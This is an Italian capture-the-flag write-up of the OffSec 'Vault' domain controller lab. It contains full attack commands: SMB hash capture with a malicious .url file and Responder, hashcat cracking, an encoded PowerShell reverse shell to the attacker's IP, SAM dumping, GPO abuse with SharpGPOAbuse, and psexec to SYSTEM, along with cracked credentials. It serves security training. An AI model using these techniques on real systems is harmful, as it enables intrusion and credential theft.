Vault
Network
- IP Target:
192.168.150.172
Enumeration
| PORT | SERVICE | VERSION | DESCRIPTION |
|---|---|---|---|
| 53/tcp | domain | Simple DNS Plus | DNS |
| 88/tcp | kerberos-sec | Microsoft Windows Kerberos | KERBEROS |
| 135/tcp | msrpc | Microsoft Windows RPC | MSRPC |
| 389/tcp | ldap | Microsoft Windows Active Directory LDAP | LDAP |
| 445/tcp | microsoft-ds? | - | SMB |
| 464/tcp | kpasswd5? | - | - |
| 593/tcp | ncacn_http | Microsoft Windows RPC over HTTP 1.0 | MSRPC |
| 636/tcp | tcpwrapped | - | LDAP |
| 3268/tcp | ldap | Microsoft Windows Active Directory LDAP | LDAP |
| 3269/tcp | tcpwrapped | LDAP | |
| 3389 | ms-wbt-server | Microsoft Terminal Services | RDP |
| 5985/tcp | http | HTTPAPI httpd 2.0 | - |
| 9389/tcp | mc-nmf | .NET Message Framing | - |
| 49666/tcp | msrpc | Microsoft Windows RPC | - |
| 49668/tcp | msrpc | Microsoft Windows RPC | - |
| 49675/tcp | ncacn_http | Microsoft Windows RPC over HTTP 1.0 | - |
| 49676/tcp | msrpc | Microsoft Windows RPC | - |
| 49708/tcp | msrpc | Microsoft Windows RPC | - |
| 49820/tcp | msrpc | Microsoft Windows RPC | - |
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.150.172
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 10:54 CET
Nmap scan report for 192.168.150.172
Host is up (0.063s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49668/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49708/tcp open unknown
49820/tcp open unknown
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ sudo nmap -Pn -sC -sV -p53,88,135,389,445,464,593,636,3268,3269,3389,5985,9389,49666,49668,49675,49676,49708,49820 -oN alltcp.txt 192.168.150.172
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 11:03 CET
Nmap scan report for 192.168.150.172
Host is up (0.067s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-18 10:03:19Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: VAULT
| NetBIOS_Domain_Name: VAULT
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: vault.offsec
| DNS_Computer_Name: DC.vault.offsec
| DNS_Tree_Name: vault.offsec
| Product_Version: 10.0.17763
|_ System_Time: 2024-12-18T10:04:08+00:00
|_ssl-date: 2024-12-18T10:04:48+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC.vault.offsec
| Not valid before: 2024-08-01T02:09:28
|_Not valid after: 2025-01-31T02:09:28
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
49820/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-18T10:04:12
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.41 seconds
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ sudo nmap -Pn -sU -sV -sC --top-ports=20 -oN top_20_udp_nmap.txt 192.168.150.172
[sudo] password for momphucker:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 12:10 CET
Nmap scan report for vault.offsec (192.168.150.172)
Host is up (0.073s latency).
PORT STATE SERVICE VERSION
53/udp open domain Simple DNS Plus
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open ntp NTP v3
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 368.78 seconds
smb
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ smbclient --no-pass -L //192.168.150.172
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DocumentsShare Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.150.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ sudo hydra -L /usr/share/seclists/Usernames/Names/names.txt -P /home/momphucker/Desktop/offsec_/machines/Thor/rockyou.txt 192.168.150.172 smb -t 1
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-18 12:57:36
[DATA] max 1 task per 1 server, overall 1 task, 145982948623 login tries (l:10177/p:14344399), ~145982948623 tries per task
[DATA] attacking smb://192.168.150.172:445/
[ERROR] invalid reply from target smb://192.168.150.172:445/
kerberos
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ sudo nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='vault' 192.168.150.172
[sudo] password for momphucker:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-19 10:44 CET
Nmap scan report for vault.offsec (192.168.150.172)
Host is up (0.065s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| guest@vault
|_ administrator@vault
Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds
Exploit
Da verifiche, l'utente Guestcon password vuota, può leggere e scrivere sulla cartella condivisa DocumentsShare.
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ crackmapexec smb 192.168.150.172 -u 'Guest' -p '' --shares #Null user
SMB 192.168.150.172 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB 192.168.150.172 445 DC [+] vault.offsec\Guest:
SMB 192.168.150.172 445 DC [+] Enumerated shares
SMB 192.168.150.172 445 DC Share Permissions Remark
SMB 192.168.150.172 445 DC ----- ----------- ------
SMB 192.168.150.172 445 DC ADMIN$ Remote Admin
SMB 192.168.150.172 445 DC C$ Default share
SMB 192.168.150.172 445 DC DocumentsShare READ,WRITE
SMB 192.168.150.172 445 DC IPC$ READ Remote IPC
SMB 192.168.150.172 445 DC NETLOGON Logon server share
SMB 192.168.150.172 445 DC SYSVOL Logon server share
A questo punto provo a sfruttare responder, usando questa fonte.
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ sudo responder -I tun0 -v
Creo un file con estensione .url, ad esempio payload.url con il seguente contenuto:
Text Only
[InternetShortcut]
URL=anyurl
WorkingDirectory=anydir
IconFile=\\x.x.x.x\%USERNAME%.icon
IconIndex=1
Sostituisco x.x.x.x con l'ip della mia macchina kali:
Text Only
[InternetShortcut]
URL=anyurl
WorkingDirectory=anydir
IconFile=\\192.168.45.172\%USERNAME%.icon
IconIndex=1
infine carico il file tramite smb:
Text Only
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ smbclient -U 'vault\Guest' //192.168.150.172/DocumentsShare
Password for [VAULT\Guest]:
Try "help" to get a list of possible commands.
smb: \> put payload.url
Responder cattura la chiamata relativa alla richiesta del paylod:
Bash
[SMB] NTLMv2-SSP Client : 192.168.150.172
[SMB] NTLMv2-SSP Username : VAULT\anirudh
[SMB] NTLMv2-SSP Hash : anirudh::VAULT:30a42726c2c524ed:B49242C70309F0FD6FBAFE91D0E7DA81:010100000000000000964FAE0F52DB01C82D83F111BAFDAB0000000002000800370033005100300001001E00570049004E002D004900560046005600560036005300490057005A00480004003400570049004E002D004900560046005600560036005300490057005A0048002E0037003300510030002E004C004F00430041004C000300140037003300510030002E004C004F00430041004C000500140037003300510030002E004C004F00430041004C000700080000964FAE0F52DB0106000400020000000800300030000000000000000100000000200000A26B564BC75A19D5CF9CFDC087083FCDDB4C8E97519F75A674E3DF5FA98AC4860A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003100370032000000000000000000
Viene quindi trovato l'utente anirudh con relativo hash di tipo NTLMv2-SSP. Procedo al crack dell'hash:
Bash
hashcat -m 5600 creds /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
E il risultato è SecureHM:
Bash
ANIRUDH::VAULT:8e79710dbe0aa60c:850d3a26af75ff29b08e9f341820ee22:010100000000000000964fae0f52db0162ac15106eaa766e0000000002000800370033005100300001001e00570049004e002d004900560046005600560036005300490057005a00480004003400570049004e002d004900560046005600560036005300490057005a0048002e0037003300510030002e004c004f00430041004c000300140037003300510030002e004c004f00430041004c000500140037003300510030002e004c004f00430041004c000700080000964fae0f52db0106000400020000000800300030000000000000000100000000200000a26b564bc75a19d5cf9cfdc087083fcddb4c8e97519f75a674e3df5fa98ac4860a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003100370032000000000000000000:SecureHM
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: ANIRUDH::VAULT:8e79710dbe0aa60c:850d3a26af75ff29b08...000000
Time.Started.....: Thu Dec 19 12:25:56 2024, (4 mins, 46 secs)
Time.Estimated...: Thu Dec 19 12:30:42 2024, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2827.3 kH/s (6.54ms) @ Accel:64 Loops:38 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 816874752/1104517645 (73.96%)
Rejected.........: 0/816874752 (0.00%)
Restore.Point....: 10608384/14344385 (73.95%)
Restore.Sub.#1...: Salt:0 Amplifier:0-38 Iteration:0-38
Candidate.Engine.: Device Generator
Candidates.#1....: Sempakata -> Searsto123
Hardware.Mon.#1..: Temp: 51c Util: 86%
Credenziali trovate:
anirudh:SecureHM
L'utente non ha accesso rdp, ma sembra averlo sulle altre cartelle smb:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ crackmapexec smb 192.168.150.172 -u 'anirudh' -p 'SecureHM' --shares
SMB 192.168.150.172 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB 192.168.150.172 445 DC [+] vault.offsec\anirudh:SecureHM
SMB 192.168.150.172 445 DC [+] Enumerated shares
SMB 192.168.150.172 445 DC Share Permissions Remark
SMB 192.168.150.172 445 DC ----- ----------- ------
SMB 192.168.150.172 445 DC ADMIN$ READ Remote Admin
SMB 192.168.150.172 445 DC C$ READ,WRITE Default share
SMB 192.168.150.172 445 DC DocumentsShare
SMB 192.168.150.172 445 DC IPC$ READ Remote IPC
SMB 192.168.150.172 445 DC NETLOGON READ Logon server share
SMB 192.168.150.172 445 DC SYSVOL READ Logon server share
Evil-winrm
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machin
└─$ evil-winrm -u anirudh -p 'SecureHM' -i 192.168.150.172
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://gpletion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents> powershell -e JABjACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUAAuADEANwAyACIALAA0ADQANQA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAH0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBD
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
connect to [192.168.45.172] from (UNKNOWN) [192.168.150.172] 49763
PS C:\Users\anirudh\Documents>
Privilege Escalation
Bash
PS C:\users\anirudh\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
Sfrutto il privilegio SeBackupPrivilege con il modulo Acl-FullControl.ps1:
PowerShell
PS C:\Users\anirudh\desktop> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\anirudh\desktop>
PS C:\Users\anirudh\desktop> Import-Module Acl-FullControl.ps1
PS C:\Users\anirudh\desktop> Acl-FullControl -user vault\anirudh -path c:\users\Administrator
In questo modo ai file di Administrator.
Scarico sam e system tramite Evil-WinRM:
Bash
*Evil-WinRM* PS C:\Temp> download sam
Info: Downloading C:\Temp\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Temp> download system
Info: Downloading C:\Temp\system to system
Info: Download successful!
Tramite pypykatz recupero gli hash degli utenti:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ pypykatz registry --sam sam system
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: e9a15188a6ad2d20d26fe2bc984b369e
============== SAM hive secrets ==============
HBoot Key: 708ec1c889bbb66d2c1e557b558ac97f10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:608339ddc8f434ac21945e026887dc36:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
A questo punto non rimarrebbe che connettersi con un pass the hash di Administrator ma nessun tecnica va a buon fine!
Mi ricollego con Evil-WinRM con l'utente anirudh e verifico quali sono le policy di dominio con Get-NetGPO e per farlo ho bisogno di PowerView.
Lo carico e lo lancio:
PowerShell
C:\Users\anirudh\Documents\wintools>powershell -ep bypass
powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\anirudh\Documents\wintools> Import-Module PowerView.ps1
PS C:\Users\anirudh\Documents\wintools> Get-NetGPO
PowerShell
Get-NetGPO
flags : 0
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB9
4F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00
A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A
28C-00C04FB94F17}]
whenchanged : 11/19/2021 9:00:32 AM
versionnumber : 4
systemflags : -1946157056
objectguid : 93130581-3375-49c7-88d3-afdc915a9526
showinadvancedviewonly : True
usnchanged : 12778
dscorepropagationdata : {11/19/2021 9:00:32 AM, 11/19/2021 8:51:14 AM, 1/1/1601 12:00:00 AM}
displayname : Default Domain Policy
gpcfunctionalityversion : 2
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vault.offsec\sysvol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C
04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault
,DC=offsec
usncreated : 5672
whencreated : 11/19/2021 8:50:33 AM
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vault,DC=offsec
flags : 0
name : {6AC1786C-016F-11D2-945F-00C04fB984F9}
gpcmachineextensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F
574B}]
whenchanged : 11/19/2021 8:50:33 AM
versionnumber : 1
systemflags : -1946157056
objectguid : 0ccc30ba-3bef-43ac-9c61-ebb814e9a685
showinadvancedviewonly : True
usnchanged : 5675
dscorepropagationdata : {11/19/2021 8:51:14 AM, 1/1/1601 12:00:00 AM}
displayname : Default Domain Controllers Policy
gpcfunctionalityversion : 2
cn : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vault.offsec\sysvol\vault.offsec\Policies\{6AC1786C-016F-11D2-945F-00C
04fB984F9}
distinguishedname : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vault
,DC=offsec
usncreated : 5675
whencreated : 11/19/2021 8:50:33 AM
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vault,DC=offsec
Controllo la prima policy:
PowerShell
PS C:\Users\anirudh\Documents\wintools> Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh
Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh
Trustee : anirudh
TrusteeType : User
Permission : GpoEditDeleteModifySecurity
Inherited : False
E sembrerebbe che sia modificabile. Per farlo ho bisogno dello strumento SharpGPOAbuse.
Lo importo della macchina target e lo eseguo in questo modo per aggiungere l'utente in mio possesso, anirudh, al gruppo Administrators:
PowerShell
./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
E lo re3ndo effettivo con:
A questo punto mi connetto con impackt-psexec in modo da accedervi con i nuovi privilegi:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ impacket-psexec vault.offsec/anirudh:SecureHM@192.168.150.172
Impacket v0.12.0.dev1+20240426.161331.37cc8f95 - Copyright 2023 Fortra
[*] Requesting shares on 192.168.150.172.....
[*] Found writable share ADMIN$
[*] Uploading file msnsAnuK.exe
[*] Opening SVCManager on 192.168.150.172.....
[*] Creating service zNov on 192.168.150.172.....
[*] Starting service zNov.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Non mi rimane che recuperare le flag:
